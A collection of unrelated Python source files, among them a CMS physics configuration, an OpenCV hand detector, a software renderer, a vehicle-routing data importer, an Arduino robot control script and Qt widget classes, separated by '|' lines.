#process.puJetIdForPFMVAMEt.jets = cms.InputTag("ak4PFJets")
process.puJetIdForPFMVAMEt.vertexes = cms.InputTag("offlineSlimmedPrimaryVertices")
process.puJetIdForPFMVAMEt.rho = cms.InputTag("fixedGridRhoFastjetAll")
process.leptonPairWithMet = cms.EDProducer('PairProducerWithMet',
vertices = cms.InputTag("offlineSlimmedPrimaryVertices"),
taus = cms.InputTag("slimmedTaus"),
muons = cms.InputTag("slimmedMuons"),
electrons = cms.InputTag("slimmedElectrons"),
mvamet = cms.InputTag("pfMVAMEt")
)
process.PairExistenceFilter = cms.EDFilter('PairExistenceFilter',
pairs = cms.InputTag("leptonPairWithMet"),
)
process.svfit = cms.EDProducer('SVFitProducer',
leptonMET = cms.InputTag("leptonPairWithMet"),
)
process.run = cms.Sequence(
process.ak4PFJets*
process.pfMVAMEtSequence*
process.leptonPairWithMet*
process.PairExistenceFilter*
process.svfit)
process.p = cms.Path(process.run)
process.e = cms.EndPath(process.out)
|
import cv2 as cv
import numpy as np
def detect (img, cascade):
rects = cascade.detectMultiScale(img, scaleFactor = 1.1 , minNeighbors = 5,
minSize=(30,30), flags=cv.CASCADE_SCALE_IMAGE)
if len(rects) == 0:
return []
rects[:, 2:] += rects[:, :2]
return rects
def findFaceAra(img, cascade):
gray = cv.cvtColor(img, cv.COLOR_RGB2GRAY)
gray = cv.equalizeHist(gray)
rect = detect(gray, cascade)
return rect
def findMaxArea(contours):
max_area = -1
max_index = -1
for i, contour in enumerate(contours):
area = cv.contourArea(contour)
x,y,w,h = cv.boundingRect(contour)
if (w*h)*0.4 > area:
continue
if w>h:
continue
if area > max_area:
max_area = area
max_index = i
if max_area < 10000:
max_index = -1
return max_index
def caculateAngle(A,B):
x1 = A[0]
y1 = A[1]
x2 = B[0]
y2 = B[1]
dot = x1*x2 + y1*y2
det = x1*x2 - y1*y2
angle = np.arctan2(det, dot) * 180/np.pi
return angle
def distanceBetweenTwoPoints(start, end):
x1, y1 = start
x2, y2 = end
return int(np.sqrt(pow(x1-x2, 2) + pow(y1-y2, 2)))
def getFingerPosition(max_contour, img_result, debug):
points1 = []
# Image Moments : 이미지 모멘트는 객체의 무게중심, 객체의 면적 등과 같은 특성을 계산할 때 유용
# cv.moments() 함수는 이미지 모멘트를 계산하고 이를 사전형 자료에 담아 리턴함.
M = cv.moments(max_contour)
cx = int(M['m10']/M['m00'])
cy = int(M['m01']/M['m00'])
# 다각형 추출
# approxPolyDP(): 다각형을 대상으로 꼭지점을 점점 줄여나가는 함수. epsilon(오차)만큼을 최대한으로 해서 꼭지점을 줄여나감
# 그래서 epsilon 값이 작을수록 원본과 비슷한 결과가 도출되고 epsilon(오차)값이 크면 클수록 꼭지점의 개수가 점점 더 줄어든다.
# , 인자로 주어진 곡선 또는 다각형을 epsilon 값에 따라 꼭지점을 줄여 새로운 곡선이나 다각형을 생성하여 리턴
# 인자 > cnt : numpy Array 형식의 곡선 또는 다각형. epsilon:근사 정확도를 위한 값. 오리지널 커브와 근사 커브 거리의 최대값으로 사용,
# True : True면 폐곡선, False면 양끝이 열려있는 곡선임을 의미
approx = cv.approxPolyDP(max_contour, 0.02*cv.arcLength(max_contour, True),
True)
# convex Hull 볼록체 : 윤곽선(points, contours)의 경계면을 둘러싸는 다각형을 구하는 알고리즘.
# 오목한 부분을 피해서 contour을 그린다.
hull = cv.convexHull(approx)
for i, point in enumerate(hull):
if cy > point[0][1]:
points1.append(tuple(point[0]))
if debug:
cv.drawContours(img_result, [hull], 0, (0,255,0), 2)
for point in points1:
cv.circle(img_result, tuple(point), 15, (0,0,0), -1)
hull = cv.convexHull(approx, returnPoints=False)
defects = cv.convexityDefects(approx, hull)
if defects is None:
return -1, None
points2 = []
for i in range(defects.shape[0]):
s,e,f,d = defects[i,0]
start = tuple(approx[s][0])
end = tuple(approx[e][0])
far = tuple(approx[f][0])
angle = caculateAngle(np.array(end) - np.array(far),
np.array(start) - np.array(far))
if angle >0 and angle<45 and d > 10000:
if start[1] < cy:
points2.append(start)
if end[1] < cy:
points2.append(end)
if debug:
cv.drawContours(img_result, [approx], 0, (255,0,255),2)
for point in points2:
cv.circle(img_result, tuple(point), 20, (0,255,0),5)
points1 = points1+ points2
points1 = list(set(points1))
new_points = []
for point1 in points1:
idx = -1
for j, points2 in enumerate(approx):
if point1 == tuple(points2[0]):
idx = j
break
if idx == -1:
continue
if idx-1 >=0:
pre = np.array(approx[idx-1][0])
else:
pre = np.array(approx[len(approx) - 1][0])
if idx + 1 <len(approx):
next = np.array(approx[idx+1][0])
else:
next = np.array(approx[0][0])
angle = caculateAngle(pre-point1, next-point1)
distnace1 = distanceBetweenTwoPoints(pre, point1)
distnace2 = distanceBetweenTwoPoints(next, point1)
if angle <45 and distnace1 >40 and distnace2 > 40:
new_points.append(point1)
return 1, new_points
def process(img_bgr, img_binary, debug):
img_result = img_bgr.copy()
contours, hierarchy = cv.findContours(img_binary, cv.RETR_EXTERNAL,
cv.CHAIN_APPROX_SIMPLE)
max_idx = findMaxArea(contours)
if max_idx == -1 :
return img_result
if debug:
cv.drawContours(img_result, [contours[max_idx]], 0, (0,0,255),3)
ret, points = getFingerPosition(contours[max_idx], img_result, debug)
if ret>0 and len(points) >0:
for point in points:
cv.circle(img_result, point, 20, [255,0,255], 5)
return img_result
face_cascade = cv.CascadeClassifier("../sample/haarcascade_frontalface_alt.xml")
cap = cv.VideoCapture('../sample/hand.avi')
# cap = cv.VideoCapture(0)
foregroundBackground = cv.createBackgroundSubtractorMOG2(
history=500, varThreshold=250, detectShadows=False
)
while(1):
ret, img_frame = cap.read()
if ret == False:
break
img_frame = cv.flip(img_frame, 1)
img_blur = cv.GaussianBlur(img_frame, (5,5), 0)
rect = findFaceAra(img_frame, face_cascade)
img_gmask = foregroundBackground.apply(img_blur, learningRate = 0)
kernel = cv.getStructuringElement(cv.MORPH_ELLIPSE, (5,5))
img_gmask = cv.morphologyEx(img_gmask, cv.MORPH_CLOSE, kernel, 1)
height, width = img_frame.shape[:2]
for x1, y1, x2, y2 in rect:
cv.rectangle(img_gmask, (x1-20, 0), (x2+20, height), (0,0,0), -1)
img_result = process(img_frame, img_gmask, debug=False)
cv.imshow('mask', img_gmask)
cv.imshow('result', img_result)
key = cv.waitKey(30)
if key == 27:
break
cap.release()
cv.destroyAllWindows()
|
## gauss_surf.py
## Port of gauss_surf.m
# From A First Course in Machine Learning, Chapter 2.
# Simon Rogers, 01/11/11 [simon.rogers@glasgow.ac.uk]
# Surface and contour plots of a Gaussian
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm
from mpl_toolkits.mplot3d import Axes3D
plt.ion()
## The Multi-variate Gaussian pdf is given by:
# $p(\mathbf{x}|\mu,\Sigma) =
# \frac{1}{(2\pi)^{D/2}|\Sigma|^{1/2}}\exp\left\{-\frac{1}{2}(\mathbf{x}-\mu)^T\Sigma^{-1}(\mathbf{x}-\mu)\right\}$
## Define the Gaussian
mu = np.array([1, 2])
sigma = np.mat([[1, 0.8], [0.8, 4]])
## Define the grid for visualisation
X,Y = np.meshgrid(np.arange(-5., 5.1, 0.1), np.arange(-5., 5.1, 0.1))
## Define the constant
const = (1/np.sqrt(2*np.pi))**2
const = const/np.sqrt(np.linalg.det(sigma))
temp = np.concatenate((np.asmatrix(X.flatten(1)).conj().transpose()
- mu[0], np.asmatrix(Y.flatten(1)).conj().transpose() - mu[1]), 1)
pdfv = const*np.exp(-0.5*np.diag(temp*np.linalg.inv(sigma)*temp.conj().transpose()))
pdfv = np.reshape(pdfv, X.shape).conj().transpose()
## Make the plots
plt.figure(1)
plt.contour(X, Y, pdfv)
fig = plt.figure(2)
ax = fig.gca(projection='3d')
surf = ax.plot_surface(X, Y, pdfv, rstride=1, cstride=1,
cmap=matplotlib.cm.jet, linewidth=0, antialiased=False)
fig.colorbar(surf)
plt.pause(.1) # required on some systems so that rendering can happen
raw_input('Press <ENTER> to continue...')
|
import numpy
from code import baseobjects as bo
from code.supports import euclidian_distance, retrieve_minimal_fleet_size
from collections import deque
class Importer(object):
def __init__(self):
self.file_lines = []
self.info = {}
self.node_coordinates_list = []
self.distance_matrix = None
self.demand_array = None
def import_data(self, filename):
self._read_file(filename)
self.info, break_lines = self._read_info()
self.node_coordinates_list, demand_list = \
self._return_nodes_and_delivery_lists(break_lines)
adjacency_matrix_list = \
self._create_distance_matrix(self.node_coordinates_list, int(self.info["DIMENSION"]))
self.distance_matrix = numpy.array(adjacency_matrix_list)
self.demand_array = numpy.array(demand_list)
def _read_file(self, my_filename):
filelines = []
with open(my_filename, "rt") as f:
filelines = f.read().splitlines()
self.file_lines = filelines
def _read_info(self):
my_filelines = self.file_lines
info = {}
start = 0
middle = 0
end = 0
for i, line in enumerate(my_filelines):
if line.startswith("NODE_COORD_SECTION"):
start = i
elif line.startswith("DEMAND_SECTION"):
middle = i
elif line.startswith("DEPOT_SECTION"):
end = i
elif line.startswith("EOF"):
break
elif line.split(' ')[0].isupper(): # checks if line begins with UPPERCASE key
splited = line.split(':')
info[splited[0].strip()] = splited[1].strip()
return info, (start, middle, end)
def _return_nodes_and_delivery_lists(self, my_breaklines):
my_filelines = self.file_lines
start, middle, end = my_breaklines
node_coordinates_list = []
demand_list = []
for i, line in enumerate(my_filelines):
if start < i < middle:
splited = line.strip().split(' ')
splited = list(map(float, splited))
node_coordinates_list.append((splited[1], splited[2]))
if middle < i < end:
splited = line.split(' ')
splited = list(map(int, splited))
demand_list.append(splited[1])
return node_coordinates_list, demand_list
def _create_distance_matrix(self, my_node_coordinates_list, my_dimension):
ncl = deque(my_node_coordinates_list[:])
matrix = []
while ncl:
row = [0] * (my_dimension + 1 - len(ncl))
node1 = ncl.popleft()
for node2 in ncl:
row.append(euclidian_distance(node1, node2))
matrix.append(row)
for i in range(my_dimension): # mirroring the matrix
for j in range(my_dimension):
try:
matrix[j][i] = matrix[i][j]
except IndexError as e:
print("##ERROR!##\nBad indexing: " + str((i, j)))
print("that definitly shouldnt happen, it >might< be a problem with the imported file")
raise e
return matrix
class DataMapper(object):
def __init__(self, my_importer):
try:
minimal_fleet_size = retrieve_minimal_fleet_size(my_importer.info["NAME"])
except AttributeError as e:
print ("couldn't read minimal fleet size from the file name\n \
file might me corrupted, please fix it manually and retry")
raise e
self.info = my_importer.info
self.network = self._create_network(my_importer.node_coordinates_list, my_importer.demand_array)
self.fleet = self._create_fleet(my_importer.info["CAPACITY"], minimal_fleet_size)
self.distance_matrix = my_importer.distance_matrix
def _create_network(self, node_coordinates_list, demand_array):
network = bo.Network()
for id_, (node_coords, demand) in enumerate(zip(node_coordinates_list, demand_array)):
node = bo.Node(id_ + 1, node_coords, demand)
network.append_node(node)
network.get_node(1).visited = True
return network
def _create_fleet(self, capacity, number_of_vehicles=0):
vehicles_left = int(number_of_vehicles)
capacity = int(capacity)
fleet = bo.Fleet()
while (vehicles_left):
vehicle = bo.Vehicle(capacity)
fleet.append_vehicle(vehicle)
vehicles_left -= 1
return fleet
|
from rv.api import m
def test_amplifier(read_write_read_synth):
mod: m.Amplifier = read_write_read_synth("amplifier").module
assert mod.flags == 81
assert mod.name == "amp"
assert mod.volume == 378
assert mod.balance == -63
assert mod.dc_offset == -33
assert mod.inverse
assert mod.stereo_width == 44
assert not mod.absolute
assert mod.fine_volume == 21087
assert mod.gain == 3948
|
#!/usr/bin/python
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# userful information :
# https://pyserial.readthedocs.io/en/latest/pyserial_api.html
# https://stackoverflow.com/questions/35642855/python3-pyserial-typeerror-unicode-strings-are-not-supported-please-encode-to
# https://pyfirmata.readthedocs.io/en/latest/https://pyfirmata.readthedocs.io/en/latest/
# http://yhhuang1966.blogspot.com/2017/04/python-arduino.html
# import library
from pyfirmata import Arduino, util
import sys, select, termios, tty
# setup the board
board = Arduino('/dev/arduino_uno')
# show information in terminal
msg = """
Control Your TurtleBot3!
---------------------------
Moving around:
w
a s d
x
w/x : increase/decrease linear velocity (Burger : ~ 0.22, Waffle and Waffle Pi : ~ 0.26)
a/d : increase/decrease angular velocity (Burger : ~ 2.84, Waffle and Waffle Pi : ~ 1.82)
space key, s : force stop
CTRL-C to quit
"""
e = """
Communications Failed
"""
# setup keyboard input
def getKey():
tty.setraw(sys.stdin.fileno())
rlist, _, _ = select.select([sys.stdin], [], [], 0.1)
if rlist:
key = sys.stdin.read(1)
else:
key = ''
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
# control arduino
#board.digital[13].write(True)
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
try:
print msg
while(1):
key = getKey()
if key == 'h' :
board.digital[13].write(True)
elif key == 'l' :
board.digital[13].write(False)
else:
if (key == '\x03'):
break
except:
print e
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
|
# Graphics Library
from src.glTypes import V2, V3, V4, dword, newColor, word
from src.glMath import barycentricCoords, camTransform, createObjectMatrix, createRotationMatrix, dirTransform, divide, cross, dot, inv, negative, norm, substract, top, transformV3
from src.objLoader import Obj
BLACK = newColor(0, 0, 0)
WHITE = newColor(1, 1, 1)
class Renderer(object):
# Constructor
def __init__(self, width, height):
self.curr_color = WHITE
self.clear_color = BLACK
self.glLookAt(V3(0,0,0), V3(0,0,-10))
self.glCreateWindow(width, height)
self.active_texture = None
self.active_texture_2 = None
self.normal_map = None
self.active_shader = None
self.directional_light = V3(0,0,-1)
self.background = None
def glCreateWindow(self, width, height):
self.width = width
self.height = height
self.glClear()
self.glViewPort(0, 0, width, height)
def glViewPort(self, x, y, width, height):
self.vpX = int(x) if x <= self.width else Exception('x is outside the window')
self.vpY = int(y) if y <= self.height else Exception('y is outside the window')
self.vpWidth = (width) if x + width <= self.width else Exception('viewport is outside the window')
self.vpHeight = (height) if y + height <= self.height else Exception('viewport is outside the window')
self.vpWidthMax = self.vpX + self.vpWidth
self.vpHeightMax = self.vpY + self.vpHeight
self.viewportMatrix = [[width/2, 0, 0, x + width/2],
[0, height/2, 0, y + height/2],
[0, 0, 0.5, 0.5],
[0, 0, 0, 1]]
self.glProjectionMatrix()
def glViewPortClear(self, color = None):
for x in range(self.vpX, self.vpX + self.vpWidth):
for y in range(self.vpY, self.vpY + self.vpHeight):
self.glPoint(x, y, color)
def glClearColor(self, r, g, b):
self.clear_color = newColor(r, g, b)
def glClear(self):
# Creates a 2D pixels list and assigns a 3 bytes color for each value
self.pixels = [ [self.clear_color for y in range(self.height)] for x in range(self.width) ]
self.zBuffer = [ [ float('inf') for y in range(self.height) ] for x in range(self.width) ]
def glClearBackground(self):
if self.background:
for x in range(self.vpX, self.vpX + self.vpWidth):
for y in range(self.vpY, self.vpY + self.vpHeight):
tx = (x - self.vpX) / self.vpWidth
ty = (y - self.vpY) / self.vpHeight
self.glPoint(x,y, self.background.getColor(tx, ty))
def glColor(self, r, g, b):
self.curr_color = newColor(r, g, b)
def glLookAt(self, eye, camPosition = V3(0,0,0), worldUp=V3(0,1,0)):
forward = substract(camPosition, eye)
forward = divide(forward, norm(forward))
right = cross(worldUp, forward)
right = divide(right, norm(right))
up = cross(forward, right)
up = divide(up, norm(up))
self.camMatrix = [[right[0],up[0],forward[0],camPosition.x],
[right[1],up[1],forward[1],camPosition.y],
[right[2],up[2],forward[2],camPosition.z],
[0,0,0,1]]
self.viewMatrix = inv(self.camMatrix)
def glProjectionMatrix(self, n = 0.1, f = 1000, fov = 60 ):
t = top(fov, n)
r = t * self.vpWidth / self.vpHeight
self.projectionMatrix = [[n/r, 0, 0, 0],
[0, n/t, 0, 0],
[0, 0, -(f+n)/(f-n), -(2*f*n)/(f-n)],
[0, 0, -1, 0]]
def glVertex(self, x, y, color = None):
if x < -1 or x > 1:
return
if y < -1 or y > 1:
return
# Calculate pixel respect to viewport
pixelX = int((x+1) * ((self.vpWidth-1) / 2) + self.vpX)
pixelY = int((y+1) * ((self.vpHeight-1) / 2) + self.vpY)
self.pixels[int(pixelX)][int(pixelY)] = color or self.curr_color
def glPoint(self, x, y, color = None):
# if the point is not in the viewport, don't draw it
if (x < self.vpX) or (x >= self.vpWidthMax) or (y < self.vpY) or (y >= self.vpHeightMax):
return
if (0 <= x < self.width) and (0 <= y < self.height):
self.pixels[int(x)][int(y)] = color or self.curr_color
def glLine(self, vertex0, vertex1, color = None, NDC = False, buffer = None):
x0 = int((vertex0.x + 1) * (self.vpWidth / 2) + self.vpX) if NDC else vertex0.x
x1 = int((vertex1.x + 1) * (self.vpWidth / 2) + self.vpX) if NDC else vertex1.x
y0 = int((vertex0.y + 1) * (self.vpHeight / 2) + self.vpY) if NDC else vertex0.y
y1 = int((vertex1.y + 1) * (self.vpHeight / 2) + self.vpY) if NDC else vertex1.y
dx = abs(x1 - x0)
dy = abs(y1 - y0)
steep = dy > dx
if steep:
x0, y0 = y0, x0
x1, y1 = y1, x1
rightToLeft = x0 > x1
if rightToLeft:
x0, x1 = x1, x0
y0, y1 = y1, y0
dx = abs(x1 - x0)
dy = abs(y1 - y0)
if dx == 0:
return
offset = 0
limit = 0.5
m = dy/dx
y = y0
for x in range(x0, x1 + 1):
if steep:
if (buffer != None):
buffer[y][x] = color or self.curr_color
else:
self.glPoint(y, x, color)
else:
if (buffer != None):
buffer[x][y] = color or self.curr_color
else:
self.glPoint(x, y, color)
offset += m
if offset >= limit:
y += 1 if y0 < y1 else -1
limit += 1
return buffer
def glLoadModel(self, filename,
translate = V3(0,0,0), scale = V3(1,1,1), rotate = V3(0,0,0)):
model = Obj(filename)
modelMatrix = createObjectMatrix(translate, scale, rotate)
rotationMatrix = createRotationMatrix(rotate)
verticesY = [ x[1] for x in model.vertices ]
self.minY = min(verticesY)
self.maxY = max(verticesY)
total = len(model.faces)
count = 0
for face in model.faces:
print(f'face {count}/{total}')
vertCount = len(face)
vertices = [None] * vertCount
textureV = [None] * vertCount
triangleV = [None] * vertCount
triangleVcam = [None] * vertCount
normals = [None] * vertCount
for i in range(vertCount):
vertices[i] = model.vertices[face[i][0]-1]
textureV[i] = model.textcoords[face[i][1]-1] if self.active_texture else 0
triangleV[i] = transformV3(vertices[i], modelMatrix)
normals[i] = dirTransform(model.normals[face[i][2]-1], rotationMatrix)
for i in range(vertCount):
triangleVcam[i] = camTransform(triangleV[i], self.viewportMatrix, self.projectionMatrix, self.viewMatrix)
self.glTriangleBarycentric(
triangleVcam[0],triangleVcam[1],triangleVcam[2],
textureCoords=(textureV[0], textureV[1], textureV[2]),
vertices=(triangleV[0],triangleV[1],triangleV[2]),
originalVertices=(vertices[0],vertices[1],vertices[2]),
normals=(normals[0],normals[1],normals[2])
)
if vertCount == 4:
self.glTriangleBarycentric(
triangleVcam[0],triangleVcam[2],triangleVcam[3],
textureCoords=(textureV[0], textureV[2], textureV[3]),
vertices=(triangleV[0],triangleV[2],triangleV[3]),
originalVertices=(vertices[0],vertices[2],vertices[3]),
normals=(normals[0],normals[2],normals[3])
)
count += 1
def glLineInterceptor(self, buffer, width, height, left, bottom, points, colorFill, colorInterceptor):
fill = False
interceptions = 0
newBuffer = buffer
for y in range(1, height):
for x in range(width):
if (x == width-1):
if (newBuffer[x][y] == colorInterceptor):
interceptions += 1
else:
if (newBuffer[x][y] == colorInterceptor and newBuffer[x+1][y] == False):
fill = not fill
interceptions += 1
if (fill):
newBuffer[x][y] = colorFill
if (interceptions < 2):
for x in range(width-1):
if (newBuffer[x][y] == colorFill):
newBuffer[x][y] = False
elif (interceptions % 3 == 0):
fillTri = False
notFillTri = False
for x in range(1, width):
if (newBuffer[x-1][y] == colorFill and newBuffer[x][y] == colorInterceptor and (x+left, y+bottom) in points):
fillTri = True
notFillTri = False
if (newBuffer[x-1][y] == colorInterceptor and newBuffer[x][y] == colorFill and (x+left, y+bottom) in points):
notFillTri = True
fillTri = False
if (fillTri):
if (newBuffer[x-1][y] == colorFill and newBuffer[x][y] == colorFill and (x+left, y+bottom) not in points):
notFillTri = True
fillTri = False
if (fillTri):
newBuffer[x][y] = colorFill
if (notFillTri):
if (newBuffer[x-1][y] == False and newBuffer[x][y] == colorInterceptor):
fillTri = True
notFillTri = False
else:
newBuffer[x][y] = False
fill = False
interceptions = 0
return newBuffer
def glFillPolygon(self, points, colorBorder = None , colorFill = None):
if colorBorder == None:
colorBorder = self.curr_color
if colorFill == None:
colorFill = self.curr_color
top = 0
bottom = self.height
left = self.width
right = 0
for i in range(len(points)):
if points[i][0] < left:
left = points[i][0]
if points[i][0] > right:
right = points[i][0]
if points[i][1] > top:
top = points[i][1]
if points[i][1] < bottom:
bottom = points[i][1]
polygonHeight = top - bottom + 1
polygonWidth = right - left + 1
polygonBuffer = [ [False for y in range(polygonHeight)] for x in range(polygonWidth) ]
for i in range(len(points)):
if i == len(points) - 1:
polygonBuffer = self.glLine(V2(points[i][0] - left, points[i][1] - bottom), V2(points[0][0] - left, points[0][1] - bottom), color=colorBorder, buffer=polygonBuffer)
else:
polygonBuffer = self.glLine(V2(points[i][0] - left, points[i][1] - bottom), V2(points[i+1][0] - left, points[i+1][1] - bottom), color=colorBorder, buffer=polygonBuffer)
polygonBuffer = self.glLineInterceptor(polygonBuffer, polygonWidth, polygonHeight, left, bottom, points, colorFill=colorFill, colorInterceptor=colorBorder)
for i in range(len(points)):
if i == len(points) - 1:
polygonBuffer = self.glLine(V2(points[i][0] - left, points[i][1] - bottom), V2(points[0][0] - left, points[0][1] - bottom), color=colorBorder, buffer=polygonBuffer)
else:
polygonBuffer = self.glLine(V2(points[i][0] - left, points[i][1] - bottom), V2(points[i+1][0] - left, points[i+1][1] - bottom), color=colorBorder, buffer=polygonBuffer)
for x in range(polygonWidth):
for y in range(polygonHeight):
if (polygonBuffer[x][y] == colorFill and polygonBuffer[x][y-1] == False):
polygonBuffer[x][y] = False
for x in range(polygonWidth):
for y in range(polygonHeight):
if polygonBuffer[x][y] == colorBorder:
self.glPoint(x+left, y+bottom, color=colorBorder)
elif polygonBuffer[x][y] == colorFill:
self.glPoint(x+left, y+bottom, color=colorFill)
def glTriangleStandard(self, A, B, C, color = None):
if A.y < B.y:
A, B = B, A
if A.y < C.y:
A, C = C, A
if B.y < C.y:
B, C = C, B
def flatBottom(v1, v2, v3):
try:
d_v2_v1 = (v2.x - v1.x) / (v2.y - v1.y)
d_v3_v1 = (v3.x - v1.x) / (v3.y - v1.y)
except:
pass
else:
x1 = v2.x
x2 = v3.x
for y in range(v2.y, v1.y + 1):
self.glLine(V2(int(x1), y), V2(int(x2), y), color=color)
x1 += d_v2_v1
x2 += d_v3_v1
def flatTop(v1, v2, v3):
try:
d_v3_v1 = (v3.x - v1.x) / (v3.y - v1.y)
d_v3_v2 = (v3.x - v2.x) / (v3.y - v2.y)
except:
pass
else:
x1 = v3.x
x2 = v3.x
for y in range(v3.y, v1.y + 1):
self.glLine(V2(int(x1), y), V2(int(x2), y), color=color)
x1 += d_v3_v1
x2 += d_v3_v2
if B.y == C.y:
# flat bottom
flatBottom(A, B, C)
elif A.y == B.y:
# flat top
flatTop(A, B, C)
elif C.y == A.y:
return # avoid division by zero
else:
# Divide triangle and draw two triangles
# teorema de intercepto
D = V2(A.x + ((B.y - A.y) / (C.y - A.y)) * (C.x - A.x), B.y)
flatBottom(A, B, D)
flatTop(B, D, C)
def glTriangleBarycentric(self, A, B, C, textureCoords = (), vertices = (), originalVertices = (), normals = (), color = None):
# Bounding box
minX = round(min(A.x, B.x, C.x))
minY = round(min(A.y, B.y, C.y))
maxX = round(max(A.x, B.x, C.x))
maxY = round(max(A.y, B.y, C.y))
triangleNormal = cross(substract(vertices[1], vertices[0]), substract(vertices[2], vertices[0]))
triangleNormal = divide(triangleNormal, norm(triangleNormal))
for x in range(minX, maxX + 1):
for y in range(minY, maxY + 1):
u, v, w = barycentricCoords(A, B, C, V2(x, y))
if u >= 0 and v >= 0 and w >= 0:
z = A.z * u + B.z * v + C.z * w
if 0 <= x < self.width and 0 <= y < self.height:
if z < self.zBuffer[x][y] and z <= 1 and z >= -1:
if self.active_shader:
r, g, b = self.active_shader(self,
vertices=vertices,
baryCoords=(u,v,w),
textureCoords=textureCoords,
originalVertices=originalVertices,
normals=normals,
pixel=(x,y),
triangleNormal = triangleNormal,
color = color or self.curr_color)
else:
b, g, r = color = self.curr_color
b /= 255
g /= 255
r /= 255
self.glPoint(x, y, newColor(r, g, b))
self.zBuffer[x][y] = z
def glFinish(self, filename):
# Creates a BMP file and fills it with the data inside self.pixels
with open(filename, "wb") as file:
# HEADER
# Signature
file.write(bytes('B'.encode('ascii')))
file.write(bytes('M'.encode('ascii')))
# FileSize in bytes
file.write(dword(14 + 40 + (self.width * self.height * 3)))
# Reserved
file.write(dword(0)) # 0 = unused
# DataOffset
file.write(dword(14 + 40)) # from beginning of file to the beginning of bitmap data
# INFO HEADER
# Size
file.write(dword(40)) # 40 = size of info header
# Width
file.write(dword(self.width))
# Height
file.write(dword(self.height))
# Planes
file.write(word(1)) # number of planes
# Bits per pixel
file.write(word(24)) # 24 = 24bit RGB. NumColors = 16M
# Compression
file.write(dword(0)) # 0 = BI_RGB no compression
# ImageSize
file.write(dword(self.width * self.height * 3))
# XpixelsPerM
file.write(dword(0))
# YpixelsPerM
file.write(dword(0))
# Colors Used
file.write(dword(0))
# Important Colors
file.write(dword(0)) # 0 = all
# COLOR TABLE
for y in range(self.height):
for x in range(self.width):
file.write(self.pixels[x][y])
|
#####don't use remove function
# list1=["swati","rani","srusti"]
# i=0
# list2=[]
# while i<1:
# m=list1[i]
# list2.append(list1[0])
# list2.append(list1[2])
# i=i+1
# print(list2)
|
import youtube_dl
def downloadFunction(self):
ydl_opts = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}],
'outtmpl': '/home/benjamin/Music/%(title)s.%(ext)s',
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
youtube_link = input("Paste youtube song link: ");
ydl.download([youtube_link])
|
'''
@author: Bren
'''
from brenpy.qt.bpQtImportUtils import QtCore
from brenpy.qt.bpQtImportUtils import QtWidgets
from brenpy.qt.bpQtImportUtils import QtGui
from brenpy.core import bpDebug
from brenpy.qt import bpQtWidgets
from brenfbx.core import bfCore
from brenfbx.qt import bfQtCore
from brenfbx.fbxsdk.core import bfObject
DEFAULT_LABEL_WIDTH = 50
class BfQWidgetBase(
bfCore.BfManagerBase,
# bfObject.BfCustomObjectManagerBase,
bpQtWidgets.BpWidgetBase,
):
def __init__(self, *args, **kwargs):
super(BfQWidgetBase, self).__init__(*args, **kwargs)
# check environment
if not isinstance(self.bf_environment(), bfQtCore.BfQtEnvironment):
raise bfQtCore.BfQtError("BfQtWidgetBase must be instanced with {} not {}".format(
bfQtCore.BfQtEnvironment, self.bf_environment()
))
def widget_mapping(self):
return self.bf_environment().widget_mapping()
class BfQWidget(
BfQWidgetBase,
QtWidgets.QWidget
):
"""Simple QWidgets subclass to enforce the use of a single fbx_manager.
To avoid fbx errors.
TODO migrate all classes to use this and track fbx_manager
"""
def __init__(self, *args, **kwargs):
super(BfQWidget, self).__init__(*args, **kwargs)
class BfQMainWindow(
BfQWidgetBase,
QtWidgets.QMainWindow
):
"""Simple QWidgets subclass to enforce the use of a single fbx_manager.
To avoid fbx errors.
"""
def __init__(self, *args, **kwargs):
super(BfQMainWindow, self).__init__(*args, **kwargs)
class BfQDialog(
BfQWidgetBase,
QtWidgets.QDialog
):
"""Simple QDialog subclass to enforce the use of a single fbx_manager.
To avoid fbx errors.
TODO migrate all classes to use this and track fbx_manager
"""
def __init__(self, bf_environment, **kwargs):
super(BfQDialog, self).__init__(bf_environment, **kwargs)
class BfTreeView(
BfQWidgetBase,
bpQtWidgets.BpQViewBase,
QtWidgets.QTreeView
):
"""
"""
def __init__(self, *args, **kwargs):
super(BfTreeView, self).__init__(*args, **kwargs)
# self.setSelectionMode(
# QtWidgets.QAbstractItemView.ExtendedSelection
# )
# self.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
class BfMappedWidget(QtWidgets.QWidget):
"""Stuff
TODO migrate to brenpy
"""
def __init__(self, parent=None):
super(BfMappedWidget, self).__init__(parent)
self._mapped = False
self._data_mapper = QtWidgets.QDataWidgetMapper()
self.setFixedHeight(20)
self._create_widgets()
self._create_layout()
